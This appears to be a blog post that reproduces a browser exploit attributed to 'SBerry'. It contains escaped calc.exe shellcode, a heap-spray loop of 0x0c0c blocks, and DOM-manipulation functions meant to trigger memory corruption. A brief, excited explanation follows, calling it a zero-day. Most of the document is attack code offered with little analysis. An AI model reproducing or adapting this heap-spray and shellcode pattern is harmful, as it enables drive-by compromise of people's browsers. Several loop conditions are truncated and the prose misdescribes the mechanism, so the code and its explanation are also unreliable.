So to expose one such example, look at the code below:
Code Author: SBerry aka Simon Berry-Byrne.
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
/* Heap Spray Code */
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)>
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600;>
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i
{
c=data.charAt(i);
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = "";
for (i=1;i
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
Now this is where I must tell you what exactly happens in the code.In the above code,
the shell code array is initialialised with many strings that are already escaped.
When the user opens a web page,the spraycontainer() adds the shellcode to the block.
and GenerateHTML() modifies the url, so that as soon as the user opens the webpage,
the shell code is provoked and run. As you can see, the browser is rendered helpless
because it first opens the webpage at your dispense, without even unescaping the
strings that are otherwise meant to run the malicious script!!
This vulnerability,ZERO DAY EXPLOIT, as it should be rightly said, is one of the most
thrilling bugs I've ever come across in any advanced softwares.
